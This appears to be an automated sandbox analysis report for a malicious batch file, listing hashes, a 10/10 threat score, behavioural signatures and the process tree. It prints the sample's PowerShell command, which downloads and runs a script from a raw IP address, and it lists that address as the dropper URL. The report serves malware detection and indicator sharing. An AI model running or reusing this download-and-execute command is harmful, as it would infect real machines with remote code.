Analysis
max time kernel: 21s
max time network: 50s
platform: windows7_x64
resource: win7v200722
submitted: 03-09-2020 19:10
Static task: static1

Behavioral task: behavioral1
Sample: 01619b049472811b76565ddd589bc9eb.bat
Resource: win7v200722 (windows7_x64)
0 signatures, 0 seconds

Behavioral task: behavioral2
Sample: 01619b049472811b76565ddd589bc9eb.bat
Resource: win10v200722 (windows10_x64)
0 signatures, 0 seconds
General
Target: 01619b049472811b76565ddd589bc9eb.bat
Size: 221B
MD5: 3ab48b49f0f231c470e42900d1a7e59f
SHA1: a25a30cfa56bd61d0484e2a37fd86fb365edf99a
SHA256: d58ef2af3b2f9387c21e0e0b5b81594a995dc4a09e8befa0f0d95700bc9a342c
SHA512: f6a7e33125726389dd01e7cfcce2286050cc48d56b465c719f8d5bfe6facef0fbf83ad47111c52ecd3d67f090e394dfaa842013f71b9b7d81f2c0e8c4e9ab4e5
Score: 10/10
Malware Config
Extracted
Language: ps1
Source URLs:
  ps1.dropper  http://185.103.242.78/pastes/01619b049472811b76565ddd589bc9eb
Signatures

Blacklisted process makes network request (1 IoC)
Processes:
  flow  pid   process
  5     1388  powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes:
  pid   process
  1388  powershell.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
  pid   process
  1388  powershell.exe
  1388  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
  description              pid   process
  Token: SeDebugPrivilege  1388  powershell.exe

Suspicious use of WriteProcessMemory (4 IoCs)
Processes:
  description                      pid  process  target process
  PID 748 wrote to memory of 1388  748  cmd.exe  powershell.exe
  PID 748 wrote to memory of 1388  748  cmd.exe  powershell.exe
  PID 748 wrote to memory of 1388  748  cmd.exe  powershell.exe
  PID 748 wrote to memory of 1388  748  cmd.exe  powershell.exe
Processes

C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\01619b049472811b76565ddd589bc9eb.bat"
  PID: 748
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (child of PID 748)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/01619b049472811b76565ddd589bc9eb');Invoke-BSCFPHAYQBPUGG;Start-Sleep -s 10000"
    PID: 1388
    - Blacklisted process makes network request
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken